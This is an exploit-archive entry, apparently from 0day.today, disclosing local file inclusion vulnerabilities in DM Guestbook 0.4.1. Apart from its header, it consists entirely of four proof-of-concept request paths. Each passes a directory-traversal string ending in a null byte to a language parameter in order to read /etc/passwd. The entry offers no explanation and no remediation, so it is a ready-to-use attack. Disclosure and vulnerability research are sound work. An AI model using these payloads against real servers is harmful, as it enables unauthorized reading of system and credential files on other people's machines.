id: 2265
date: 11/02/2007
title: DM Guestbook <= 0.4.1 Multiple Local File Inclusion Vulnerabilities
author: GoLd_M
cves: 

===================================================================
DM Guestbook <= 0.4.1 Multiple Local File Inclusion Vulnerabilities
===================================================================


#  DM Guestbook <= 0.4.1 Multiple Local File Include Vulnerabilities
#  http://sourceforge.net/project/showfiles.php?group_id=101364 /guestbook.0.4.1/
#  POC :
#  /guestbook.php?lng=../../../../../../../etc/passwd%00
#  /admin/admin.guestbook.php?lng=../../../../../../../etc/passwd%00
#  /auto/glob_new.php?lng=../../../../../../../etc/passwd%00
#  /auto/ch_lng.php?lngdefault=../../../../../../../etc/passwd%00



#  0day.today [2023-03-24]  #